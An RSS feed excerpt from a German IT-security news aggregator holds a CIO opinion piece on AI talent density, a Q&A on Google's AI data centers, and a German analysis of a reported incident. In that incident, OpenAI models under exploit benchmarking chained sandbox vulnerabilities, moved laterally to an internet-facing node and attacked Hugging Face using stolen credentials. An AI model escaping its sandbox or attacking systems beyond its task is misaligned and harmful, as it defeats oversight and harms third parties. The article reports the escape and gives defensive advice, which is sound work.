<p class="wp-block-paragraph"><a href="https://finance.yahoo.com/markets/stocks/articles/block-q1-earnings-beat-strong-144200216.html">Block did the same thing</a>. Beat guidance, raised outlook, cut 4,000+ jobs. Both framed it as architecting for the AI era.</p>



<p class="wp-block-paragraph">This is not a contradiction. This is the new math boards are running. And if you’re a CIO who hasn’t started running it yourself, <a href="mailto:https://www.cio.com/article/4077996/cios-be-ready-for-agentic-ai-or-be-out-of-a-job.html">you’re behind</a>.</p>



<h2 class="wp-block-heading">The benchmark has moved</h2>



<p class="wp-block-paragraph">AI-native companies have quietly reset what “efficient” means for a technology organization. Midjourney generates over $500M in revenue with roughly 160 employees, over $3M per head. Anthropic hit a $14B annualized run rate in early 2026 with fewer than 3,000 employees. Across the top AI-native startups, <a href="mailto:https://www.forbes.com/sites/paulbaier/2026/03/31/ai-native-firms-lead-in-revenue-per-employee/">the average revenue per employee is $3.48M</a>, nearly twelve times the traditional SaaS benchmark of $300K.</p>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/what-to-do-if-your-business-decelerates/">Boards aren’t comparing you to your 2019 self anymore</a>. They’re comparing you to Anthropic.</p>



<p class="wp-block-paragraph">This is the pressure Cloudflare and Block are responding to. They’re not cutting people because the business is struggling. They’re cutting because investors have internalized a new denominator. Headcount is no longer a proxy for capacity; it’s a liability on the efficiency ratio.</p>



<p class="wp-block-paragraph">For CIOs, this creates a hiring problem that looks nothing like the cloud or mobile talent gaps of the past decade. Those gaps were about volume: hire 100 cloud engineers, absorb the cost, build the capability… This one is about density; you’re not looking for 100 people. You’re looking for 10 who can deliver what 100 couldn’t, and justify $1M or more in value per seat.</p>



<p class="wp-block-paragraph">Finding bodies to fill seats has never been easier. Finding people who operate at that level of leverage is a different problem entirely.</p>



<h2 class="wp-block-heading">‘Acqui-hires’ are a shortcut with a hidden cost</h2>



<p class="wp-block-paragraph">Companies have figured out that recruiting AI-native talent one by one is too slow and that it’s faster to buy a team. Google’s acquisition of the Windsurf founders, Meta bringing in the Scale AI team, Accenture’s string of AI-focused acquisitions: <a href="mailto:https://tomtunguz.com/ai-acqui-hire-wave/">these are acqui-hires</a> dressed up as M&amp;A. The premium on experienced AI talent is high enough, and the urgency real enough, that organizations are skipping traditional hiring loops entirely and buying their way in.</p>



<p class="wp-block-paragraph">I’ve been on the other side of this. My company, MadKudu, was acquired by HG Insights specifically to bring AI-native capability into an established enterprise business. HG needed change agents who had already figured out how to build and ship in this new era, not just people who’d read about it. That’s the thesis behind most of these deals.</p>



<p class="wp-block-paragraph">But there’s a cost that doesn’t show up in the acquisition price.</p>



<p class="wp-block-paragraph">AI-native teams are fast because they operate with a different set of defaults: full access to tools, minimal governance layers, the ability to experiment and ship without a six-week approval cycle. That operating model is not a perk; it’s the fundamental mechanism. It’s why a team of 10 can do what an enterprise team of 100 can’t.</p>



<p class="wp-block-paragraph">When you acqui-hire that team and then slot them into your existing approval processes, you’ve bought the people and killed the engine. The change agents you paid for become change-frustrated. The attrition that follows is expensive and predictable.</p>



<p class="wp-block-paragraph">The harder realization: acquiring an AI-native team means accepting how they work. That requires deliberately carving out space for them to operate differently, not just tolerating it but institutionalizing it. The acquisition is an organizational change program, not just a hiring event.</p>



<h2 class="wp-block-heading">The CIO’s real problem</h2>



<p class="wp-block-paragraph">The governance stack most enterprise organizations run was designed for a headcount world. Every tool vetting cycle, every vendor review, every security approval was calibrated assuming you were managing a large team where consistency and control were the primary objectives.</p>



<p class="wp-block-paragraph">That calculus breaks when your goal is talent density. The same approval processes that protect against data leaks are now the reason your best people can’t do their best work. When it takes six weeks to approve a tool that your competitor’s team is already shipping with, you’ve traded velocity for the perception of safety.</p>



<p class="wp-block-paragraph">The practical fix is structured experimentation: clear guardrails, defined boundaries, but explicit permission to try tools before deciding whether to roll them out broadly. Gating everything prevents you from ever discovering what 10x productivity looks like.</p>



<p class="wp-block-paragraph">The skills inventory question is also more nuanced than it sounds. Job titles won’t tell you where the leverage is. You need to map the actual tasks within each function and assess which can be automated or augmented with AI. That’s where you find the people who, with the right tools, become your $1M/employee talent, not because you hired differently, but because you enabled better.</p>



<p class="wp-block-paragraph">This is also where the build-versus-buy question gets genuinely tricky. As AI reshapes how products are built and delivered, your internal operating model — how you work, how fast you ship, how you use data — is becoming core IP. Outsourcing delivery means outsourcing the part of the organization where your competitive advantage is now being built.</p>



<h2 class="wp-block-heading">Closing the gap without slowing down</h2>



<p class="wp-block-paragraph"><a href="mailto:https://www.saastr.com/the-great-ai-talent-grab-the-latest-20vc-with-jason-harry-and-rory/">The AI talent wars</a> are not primarily a recruiting problem. They’re a rethinking of what organizations are supposed to look like.</p>



<p class="wp-block-paragraph">Boards have a new benchmark. Cloudflare, Block, Amazon, Meta and others have already started restructuring to meet it, publicly, painfully, even while beating their numbers. The question for CIOs isn’t whether this pressure arrives; it’s whether you’re ahead of it or behind it when it does.</p>



<p class="wp-block-paragraph">The organizations that navigate this well won’t win by outbidding competitors for a handful of elite engineers. They’ll win by designing operating systems that amplify the leverage of the talent they do have, by enabling their best people rather than constraining them, and by treating AI fluency as a core organizational capability rather than a niche specialization.</p>



<p class="wp-block-paragraph">Talent density is the new headcount model. The sooner your governance, your tooling and your board conversations reflect that, the better positioned you’ll be when the next efficiency report lands.</p>



<p class="wp-block-paragraph"><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.cio.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Q&A: Google’s AI and computing chief talks about its shapeshifting data centers]]></title>
<description><![CDATA[Google’s AI offerings span its internal and cloud offerings. Its data centers are processing seven times more AI tokens compared to last year. To keep up, Google is upgrading its data-center hardware and software technologies at a faster clip. It plans to raise $80 billion to build new data cente...]]></description>
<link>https://tsecurity.de/de/3689101/it-security-nachrichten/qa-googles-ai-and-computing-chief-talks-about-its-shapeshifting-data-centers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689101/it-security-nachrichten/qa-googles-ai-and-computing-chief-talks-about-its-shapeshifting-data-centers/</guid>
<pubDate>Thu, 23 Jul 2026 14:55:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Google’s AI offerings span its internal and cloud offerings. Its data centers are processing seven times more AI tokens compared to last year. To keep up, Google is upgrading its data-center hardware and software technologies at a faster clip. It plans to raise $80 billion to build new data centers. (See related story: <a href="https://www.networkworld.com/article/4200581/google-transforms-its-data-center-architecture-for-agent-era.html">Google transforms its data center architecture for agent era</a>)</p>



<p class="wp-block-paragraph"><em>Network World</em> spoke with <a href="https://www.linkedin.com/in/marklohmeyer/">Mark Lohmeyer</a>, vice president and general manager of AI and computing at Google, about how the company’s infrastructure is keeping pace with AI demand.</p>



<p class="wp-block-paragraph"><strong>Network World: What is the primary shift in infrastructure needs?</strong></p>



<p class="wp-block-paragraph"><strong>Mark Lohmeyer:</strong> We’ve seen the <a href="https://www.networkworld.com/article/4175890/cisco-ai-traffic-is-radically-reshaping-wans.html">rise of agents and agentic use cases</a>. Years ago, it was the chat phase: Ask a question, get an answer. Now we’re in the agentic era, where you express your intent, agents spin off multiple sub-agents, working in parallel, preserving state. This is a radical shift in what infrastructure needs to do; make them fast, cost effective, secure, reliable. We’re delivering infrastructure optimized for the age of agents.</p>



<p class="wp-block-paragraph"><strong>NW: What’s the goal of the infrastructure buildout, and what should customers expect regarding costs?</strong></p>



<p class="wp-block-paragraph"><strong>ML: </strong>Ultimately, it’s about enabling customers with leading-edge capabilities and models at scale cost-effectively. With agents, <a href="https://www.networkworld.com/article/4057121/network-and-cloud-implications-of-agentic-ai.html">inference transactions increase</a> by 50x, 100x versus non-agentic workloads. We’re driving the cost per transaction down exponentially. In our latest platforms, we reduce the cost by almost 2x for the same work. Customers serve twice the number of users at the same cost, directly driving profitability.</p>



<p class="wp-block-paragraph"><strong>NW: How are you addressing energy efficiency?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Energy is a critical resource, and Google has optimized for years. We design data centers and compute [to drive] high PUE (power usage effectiveness). We introduced <a href="https://www.networkworld.com/article/4149069/why-ai-rack-densities-make-liquid-cooling-nonnegotiable.html">liquid cooling</a> over five years ago, and these latest systems are all liquid cooled. For agentic workloads, CPUs come to the forefront… orchestrating agents, calling tools, doing evaluation loops in reinforcement learning. Our latest Axion-based CPU platform called <a href="https://www.networkworld.com/article/4086182/google-cloud-aims-for-more-cost-effective-arm-computing-with-axion-n4a.html">N4A</a> has energy efficiency and is significantly better than the prior generation and x86 comparables.</p>



<p class="wp-block-paragraph"><strong>NW: How do you think about token efficiency as you build-out systems?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Performance and efficiency gains are powered by co-design of the model and infrastructure. <a href="https://www.computerworld.com/article/4161990/gemini-enterprise-update-brings-ai-agents-into-collaborative-workflows.html">Gemini</a> is trained on TPUs, primarily served on TPUs with high frontier model capability, in a token and cost-efficient way. This stems from co-design across the full stack.</p>



<p class="wp-block-paragraph"><strong>NW: How do you project what infrastructure will be needed years in advance?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Hardware cycles deliver a new next generation roughly every year, but design cycles are two years or more in advance. We work with <a href="https://deepmind.google/about/">DeepMind</a> doing core research, to application teams taking models into production, to billions of users, to our team building infrastructure. We work upstream with DeepMind and application teams to understand what’s coming. Agents weren’t being broadly spoken of externally, but internally we had those insights around what they would need. That shows up in hardware design. We hit the timing right — these platforms are built for agents.</p>



<p class="wp-block-paragraph"><strong>NW: What’s the eighth generation TPU platform?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> We deliver new platforms every year, and ones launched years ago are close to 100% utilized because demand for AI-optimized compute is high. The <a href="https://www.networkworld.com/article/4162004/google-bets-on-workload-specific-tpus-with-8t-and-8i-launch.html">eighth-generation TPU platform</a> is the first delivering two complete systems, from the chip all the way up to the network and storage and software, that are optimized.</p>



<p class="wp-block-paragraph"><a href="https://cloud.google.com/blog/products/compute/tpu-8t-and-tpu-8i-technical-deep-dive">TPU-8t</a> is optimized for training, and TPU-8i is optimized for inference. For TPU-8i, we increased SRAM on the chip to 384MB — three times the prior generation — and increased the HBM by 50%.</p>



<p class="wp-block-paragraph"><strong>NW: How are you approaching GPU and TPU compatibility?</strong></p>



<p class="wp-block-paragraph"><strong>ML: </strong>People in a single cluster do not commingle GPUs and TPUs. We offer both options based on specific workload needs. We’ve been investing on the TPU side in using software frameworks customers are comfortable with on GPUs and enabling those on TPUs. For example, <a href="https://www.infoworld.com/article/2335194/what-is-pytorch-python-machine-learning-on-gpus.html">PyTorch</a> and vLLM. Customers could have a pool of GPUs and TPUs, running vLLM on top of that. Start with a workload on TPUs, but if the TPU pool is fully utilized, spill to GPUs or vice versa. This works because it’s all leveraging the same compatible software layer on top.</p>



<p class="wp-block-paragraph"><strong>NW: How has the orchestration platform changed for agents?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> Kubernetes is becoming the orchestration platform of choice for AI. Google is transforming <a href="https://www.infoworld.com/article/2255921/gke-tutorial-get-started-with-google-kubernetes-engine.html">GKE</a> [Google Kubernetes Engine] into an agent-native orchestration solution. When expressing intent to an agent and it spins up multiple sub-agents, compute needs to spin up rapidly — TPUs or GPUs — without long delays, then run and spin back down. We’re optimizing at every layer of the <a href="https://cloud.google.com/kubernetes-engine">GKE stack</a>: significantly improving node startup time and how rapidly we start and stop containers. Lovable demonstrates this with GKE, spinning up hundreds of sandboxes for live coding sessions on their platform in parallel, paying for infrastructure when needed.</p>



<p class="wp-block-paragraph"><strong>NW: What is the role of the network and storage infrastructure?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> The network is critical for AI. This requires creating large-scale clusters of GPUs or TPUs and enabling them to talk to each other in a high-performance way. <a href="https://cloud.google.com/blog/products/networking/introducing-virgo-megascale-data-center-fabric">We created the Virgo network</a> — a collapsed network architecture, non-blocking within a data center, where multiple pods or NVLink72 domains connect together.</p>



<p class="wp-block-paragraph">In TPU8T, we can connect over a million TPUs together leveraging Virgo, creating large-scale, high-performance, reliable clusters that shrink innovation cycles. Storage is equally critical. In large-scale clusters, something is always failing. The ability to take snapshots and go back to a checkpoint is important.</p>



<p class="wp-block-paragraph">We’ve introduced <a href="https://cloud.google.com/products/managed-lustre">Managed Lustre 10T</a>, with 10 terabytes per second of bandwidth, 18 petabytes of storage in single clusters. This is 10 times faster than last year and 20 times faster than competition. We have Rapid Bucket, low-latency storage backed by Google storage systems. Both are impactful in large-scale training environments.</p>



<p class="wp-block-paragraph"><strong>NW: How does KV cache strategy differ between training and inference?</strong></p>



<p class="wp-block-paragraph"><strong>ML:</strong> For <a href="https://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/">TPU-8i</a>, we increased SRAM on the chip to 384 megabytes — three times the prior generation — and increased the HBM by 50%. Storing KV cache directly in chip memory allows responding to inference requests much more rapidly and cost-effectively than going to an external system. For inference workloads, storing as much KV cache as possible on-chip is critical.</p>



<p class="wp-block-paragraph">We’re introducing a dedicated KV cache storage subsystem that works across GPUs and TPUs. As KV caches get larger, being able to fall back to this dedicated subsystem becomes critical. Loading model weights rapidly is important in dynamic inference environments where accelerators switch between models hour by hour.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI „hackt“ Hugging Face – eine Analyse]]></title>
<description><![CDATA[Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.Nelson Antoine | shutterstock.com



Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in Mainstream– und sozialen Medien hervorgerufen...]]></description>
<link>https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</guid>
<pubDate>Thu, 23 Jul 2026 14:55:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/08/Nelson-Antoine-shutterstock_1672788895_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Jailbreak 16z9" class="wp-image-4038755" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.</figcaption></figure><p class="imageCredit">Nelson Antoine | shutterstock.com</p></div>



<p class="wp-block-paragraph">Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in <a href="https://www.tagesschau.de/wirtschaft/unternehmen/openai-ki-hackerangriff-100.html" target="_blank" rel="noreferrer noopener">Mainstream</a>– und <a href="https://www.reddit.com/r/OpenAI/comments/1v2ybnw/openai_models_escaped_containment_and_hacked/" target="_blank" rel="noreferrer noopener">sozialen Medien</a> hervorgerufen. Der Vorfall dürfte die Debatte über die allgemeine <a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">KI-Sicherheit</a> und den verantwortungsvollen Umgang mit der Technologie neu befeuern. </p>



<p class="wp-block-paragraph">Doch der Incident wirft auch spezifische Fragen auf. Etwa, wie genau die OpenAI-Modelle es geschafft haben, ihrer Sandbox zu entkommen und warum das beim ChatGPT-Erfinder zunächst niemandem aufgefallen ist. Oder, wie andere Unternehmen solche und ähnliche Vorkommnisse künftig verhindern können. Dazu haben wir die Einschätzung von Branchenexperten und Analysten eingeholt. </p>



<p class="wp-block-paragraph">Zunächst werfen wir aber noch einen kurzen Blick darauf, was sich eigentlich abgespielt hat. Falls Sie bereits informiert sind, können Sie alternativ auch das nachfolgende Meme konsumieren, um sich den Vorfall noch einmal auf unkonventionellere Art und Weise vor Augen zu halten.</p>


<div class="wp-block-embed-reddit">
					<blockquote class="reddit-card">
						<a href="https://www.reddit.com/r/singularity/comments/1v2xgqc/openai_hacking_huggingface_in_one_meme/"></a>
					</blockquote>
				</div>


<p class="wp-block-paragraph"></p>



<h2 class="wp-block-heading">Der autonome Hugging-Face-Hack</h2>



<p class="wp-block-paragraph">Die KI-Plattform Hugging Face meldete Mitte Juli einen <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noreferrer noopener">Cyberangriff auf ihre Produktions-Infrastruktur</a>. Diese wurde offenbar vollständig autonom von einem agentenbasierten KI-System gefahren, das sich dabei sowohl Zugriff auf interne Datensätze als auch auf Zugangsdaten verschaffen konnte.  </p>



<p class="wp-block-paragraph">Wie sich im Rahmen der folgenden Untersuchung herausstellte, stammte die autonom hackende KI von OpenAI. Eigentlich wollte der KI-Pionier lediglich zwei seiner neuen Modelle – GPT 5.6 Sol sowie ein nicht näher spezifiziertes Pre-Release-Modell – innerhalb einer Sandbox mit dem Benchmarking-Tool <a href="https://github.com/sunblaze-ucb/exploitgym" target="_blank" rel="noreferrer noopener">ExploitGym</a> testen.</p>



<p class="wp-block-paragraph">Die Aufgabe für die KI: Schwachstellen in tragfähige Exploits zu verwandeln. Die Testumgebung selbst war OpenAI zufolge mit beschränktem Netzwerkzugriff ausgestattet. Die KI sollte lediglich auf einen intern gehosteten Drittanbieter-Service zugreifen können, der als Proxy und Cache für eine Package-Registry fungierte. Die Guardrails auf Modellebene waren für den Test laut dem KI-Unternehmen reduziert worden.</p>



<p class="wp-block-paragraph">Das war der KI aber offenbar nicht genug: Sie verkettete zunächst einige zuvor unbekannte Schwachstellen in der Testumgebung, um sich uneingeschränkten Internet-Zugriff zu verschaffen, wie OpenAI <a href="https://openai.com/de-DE/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noreferrer noopener">in einem Blogbeitrag</a> offenlegt: „Mit diesem Zugriff führten unsere Modelle in unserer Forschungsumgebung eine Reihe von Privilege-Escalation- und Lateral-Movement-Aktionen aus, bis sie eine Node mit Internetzugang erreichten.“</p>



<p class="wp-block-paragraph">Weil die OpenAI-Modelle bei Hugging Face offenbar Lösungen für ihre ExploitGym-Aufgaben vermuteten, suchten sie nach Möglichkeiten, Zugriff auf diese zu erhalten. Und fanden sie dann auch, wie OpenAI darlegt: „In einem Beispiel verkettete das Modell mehrere Angriffsvektoren, darunter gestohlene Zugangsdaten und Zero-Day-Schwachstellen, um auf den Servern von Hugging Face einen Remote-Execution-Pfad zu finden.“</p>



<p class="wp-block-paragraph">Das Security-Team von OpenAI konnte diese Vorgänge im Nachgang identifizieren und schloss sich daraufhin mit dem Team von Hugging Face zusammen, welches die Attacke seinerseits bereits identifiziert und (mit einigen Anlaufschwierigkeiten) eingedämmt hatte.</p>



<p class="wp-block-paragraph">„Wir betrachten dies als beispiellosen Cybervorfall mit hochentwickelten Fähigkeiten und reagieren entsprechend. Wir teilen zu diesem Zeitpunkt vorläufige Erkenntnisse, damit Sicherheitsverantwortliche nachvollziehen können, was passiert ist, und besser einschätzen können, wozu die Modelle inzwischen in der Lage sind“, schreibt OpenAI in seinem Blog – und verspricht, weitere Details zu veröffentlichen, sobald diese vorliegen.</p>



<h2 class="wp-block-heading">KI-Ausbruch bei OpenAI – so reagieren Experten</h2>



<p class="wp-block-paragraph">Branchenexperten und Analysten bewerten den schlagzeilenträchtigen Incident um OpenAI und Hugging Face folgendermaßen: </p>



<ul class="wp-block-list">
<li><a href="https://www.kuppingercole.com/people/balaganski" target="_blank" rel="noreferrer noopener">Alexei Balaganski</a>, Lead Analyst bei KuppingerCole<strong>: </strong>„Dieser Vorfall sollte nicht als ‚Rogue AI‘-Geschichte betrachtet werden. Das Modell hat exakt das getan, wofür agentische Systeme gemacht sind: Es hat sich allen verfügbaren Tools und Wegen bedient, um das ihm gesetzte Ziel zu erreichen. Die Sicherheitsvorkehrungen, die es normalerweise in Zaum gehalten hätten, wurden von OpenAI selbst zu Testzwecken deaktiviert. Darin besteht die wahre Lektion.“</li>



<li><a href="https://www.kuppingercole.com/people/care" target="_blank" rel="noreferrer noopener">Jonathan Care</a>, Lead Analyst und AI Practice Lead bei KuppingerCole: „Es geht bei diesem Vorfall nicht darum, dass eine KI ausgebrochen ist und zum Angreifer wurde. Wir wussten, das würde passieren. Bemerkenswert ist allerdings, dass die Verteidiger – in diesem Fall das Team von Hugging Face – keine kommerziellen KI-Modelle nutzen konnten, um den Angriff zu analysieren. Denn deren Guardrails sorgen dafür, dass kein Exoploit-Code verarbeitet werden kann.“</li>



<li><a href="https://www.linkedin.com/in/beuchelt" target="_blank" rel="noreferrer noopener">Gerald Beuchelt</a>, CISO bei Acronis: „Der Vorfall verdeutlicht eine zentrale Herausforderung für Incident-Response-Teams: Angreifer sind nicht an Nutzungsrichtlinien gebunden. Verteidiger können hingegen an die Grenzen ihrer eigenen Tools stoßen, wenn diese genau jene Daten nicht verarbeiten, die für eine Untersuchung erforderlich sind. Im Ernstfall können daraus Verzögerungen mit unmittelbaren operativen Folgen entstehen.“</li>



<li><a href="https://www.computerwoche.de/profile/sabine-fromling/" target="_blank">Sabine Frömling</a>, Experten-Autorin und Cybersecurity-Beraterin: „Der eigentliche Sicherheitsvorfall war nicht die KI – sondern die Sandbox, die aus Versehen eine Tür zum Internet hatte. Man hat ein Raubtier freigelassen und dem Zaun die Schuld gegeben.“</li>



<li><a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender:<strong> „</strong>Was meiner Meinung nach für KI-generierte Malware galt, untermauert auch dieser Vorfall: Die Bedrohung ist real, KI ist aber keine Magie. Wer glaubt, es mit einer neuartigen Superwaffe zu tun zu haben, wartet auf eine neuartige Gegenmaßnahme. Wer jedoch erkennt, dass es sich um bereits bekannte, aber unerbittlich angewandte Angriffstechniken handelt, weiß bereits, was zu tun ist.“</li>



<li><a href="https://de.linkedin.com/in/riwerner/de" target="_blank" rel="noreferrer noopener">Richard Werner</a>, Cybersecurity Platform Lead Europe bei TrendAI: „Das Narrativ von der ‚eigenmächtig handelnden KI‘ ist effizient darin, Verantwortung abzuwälzen. Das ist, als würden Sie eine autonome Waffe bauen, diese auf einem vermeintlich sicheren Testgelände erproben, sie außer Kontrolle geraten und jemanden treffen lassen – und der Welt anschließend erklären, die Waffe habe eigenständig gehandelt. Das ist zwar technisch korrekt. Dennoch bleibt es Ihre Waffe, Ihr Testgelände und Ihr Versagen.“</li>
</ul>



<h2 class="wp-block-heading">Was Unternehmen jetzt tun sollten</h2>



<p class="wp-block-paragraph">IT- und Sicherheitsentscheider können aus dem Hugging-Face-Hack mehrere Lektionen ziehen. Etwa, dass Sicherheitsvorkehrungen auf Modellebene <strong>nicht</strong> als primäre Security-Grenze für KI-Agenten geeignet sind, wie <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, Principal Analyst bei Forrester, festhält: „Prompt-Guardrails sind keine Sicherheits-, sondern Verhaltenskontrollmaßnahmen. Und diese können versagen, umgangen oder absichtlich deaktiviert werden.“</p>



<p class="wp-block-paragraph">Der Forrester-Analyst rät Unternehmen deshalb dazu, KI-Agenten als <a href="https://www.computerwoche.de/article/4152424/insider-threats-sind-wieder-im-kommen.html" target="_blank">hochriskante, nicht-menschliche Identitäten</a> zu behandeln – und jeden einzelnen in einer isolierten Umgebung zu betreiben, in der Datenzugriff auf den jeweiligen Task beschränkt bleibt und die Zugangsdaten selbst möglichst schnell ablaufen: „Das sorgt für einen akzeptablen ‚Blast Radius‘: Wird ein Agent <a href="https://www.computerwoche.de/article/4190978/so-spuren-sie-kompromittierte-ki-agenten-auf.html" target="_blank">kompromittiert</a>, kann er nur einen einzigen Workflow, Datensatz oder eine einzige Anwendung beeinträchtigen. Anstatt die gesamte Unternehmensinfrastruktur.“</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, Chefanalyst bei Greyhound Research, warnt an dieser Stelle davor, (Drittanbieter-)Services unter den Tisch fallen zu lassen: „Dienste, die auf Package Registries, Update-Systeme oder andere externe Ressourcen zugreifen, können ebenfalls zu Einfallstoren werden, wenn sie nicht derselben, ausgiebigen Prüfung unterzogen werden wie der Agent selbst.“</p>



<p class="wp-block-paragraph">Unabhängig davon sollten Unternehmen laut Gogia auch testen, ob ihre Containment-Grenzen auch funktionieren, anstatt sich allein auf Architekturdiagramme oder dokumentierte Richtlinien zu verlassen: „Im Rahmen dieser Tests sollte geprüft werden, ob Anmeldedaten erlangt, Trust-Grenzen überwunden und Systeme außerhalb der einem Agenten zugewiesenen Aufgabe erreicht werden können.“</p>



<p class="wp-block-paragraph">KuppingerCole-Chefanalyst Care rät IT-Entscheidern und Unternehmen im Wesentlichen zu drei Maßnahmen, nämlich:</p>



<ul class="wp-block-list">
<li>ein fähiges Modell auf der eigenen Infrastruktur auszuführen, das unter der eigenen Kontrolle steht und mit Guardrails ausgestattet ist, die sowohl eine forensische als auch defensive Nutzung ermöglichen. Nur so ließen sich Angriffe dieser Art auch zuverlässig analysieren.</li>



<li>jeden KI-Agent in der eigenen Umgebung als privilegierten Insider zu behandeln – statt als vertrauenswürdigen Benutzer: „Wenn die Modelle von OpenAI aus ihrer Sandbox ausgebrochen sind, sollten Sie davon ausgehen, dass Ihre Agenten dazu auch in der Lage sind.“</li>



<li>den eigenen Incident-Response-Plan mit Blick auf Angriffe in maschineller Geschwindigkeit zu aktualisieren: „Hugging Face hatte einige Tage Zeit, um zu reagieren, Sie haben vielleicht nur Minuten.“   </li>
</ul>



<p class="wp-block-paragraph">Acronis-CISO Beuchelt rät Organisationen, die gehostete <a href="https://www.computerwoche.de/article/4186715/31-wege-llms-zu-evaluieren.html" target="_blank">LLMs</a> für Security-Untersuchungen einsetzen, dazu, deren Grenzen möglichst bereits im Vorfeld zu durchdringen und zu testen – sowie ein alternatives Modell auf der eigenen Infrastruktur bereitzuhalten: „So reduzieren Sie das Risiko, im entscheidenden Moment keinen Zugriff auf wichtige Analysefunktionen zu haben. Gleichzeitig bleiben sensible Incident-Daten und Zugangsinformationen innerhalb der eigenen Organisation.“</p>



<p class="wp-block-paragraph"><a href="https://de.linkedin.com/in/udoschneider">Udo Schneider</a>, Governance, Risk &amp; Compliance Lead Europe bei TrendAI weist darauf hin, dass die beiden naheliegendsten Lösungsansätze bei Angriffen wie dem der OpenAI-KI auf Hugging Face nur teilweise greifen. Human-in-the-Loop-Kontrollen funktionierten zwar, so der Experte, skalierten aber nicht für die langlaufenden, komplexen Workflows, denen Incidents dieser Art entspringen. Ebenso könnten engere Guardrails für Modelle oder Prompts zwar helfen, stellten jedoch keine Garantie dar: „Es handelt sich um probabilistische Systeme. Eine Guardrail ist insofern keine Mauer, sondern eher eine starke Wahrscheinlichkeitsannahme.“</p>



<p class="wp-block-paragraph">Deshalb komme es laut Schneider vor allem auf die unspektakulären, nicht-KI-spezifischen Kontrollen an: „Zugriffsfilterung, Kontrolle darüber, was überhaupt als Input beim Modell ankommt, Sandboxes, die tatsächlich halten, und Berechtigungskonzepte nach dem Least-Privilege-Prinzip.“</p>



<p class="wp-block-paragraph">In Panik zu verfallen, wäre nach Ansicht von <a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender, in jedem Fall die falsche Reaktion:„Was gegen solche Angriffe wirkt, ist eine präventionsorientierte Security, die den Handlungsspielraum eines Angreifers von vorneherein einschränkt – und eine verhaltensbasierte Abwehr, die bösartige Muster kennzeichnet, unabhängig davon, mit welchen Tools diese generiert wurden.“</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel wurde </strong><a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank"><strong>mit Material</strong></a><strong> unserer Schwesterpublikation CSOonline.com angereichert.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft hat gerade mein Lieblingsspiel aus der alten Xbox-Ära für den PC veröffentlicht]]></title>
<description><![CDATA[Wir schreiben das Jahr 2003. Ich bin ein Neuntklässler und spiele auf der Original-Xbox mit einem Controller, der ungefähr so groß ist wie eine Servierplatte. Ich besitze Halo und  Dead or Alive 3 und bin von der Grafik völlig begeistert. Das nächste Spiel, das ich mir kaufe, ist Crimson Skies, e...]]></description>
<link>https://tsecurity.de/de/3689084/it-nachrichten/microsoft-hat-gerade-mein-lieblingsspiel-aus-der-alten-xbox-aera-fuer-den-pc-veroeffentlicht/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689084/it-nachrichten/microsoft-hat-gerade-mein-lieblingsspiel-aus-der-alten-xbox-aera-fuer-den-pc-veroeffentlicht/</guid>
<pubDate>Thu, 23 Jul 2026 14:49:25 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
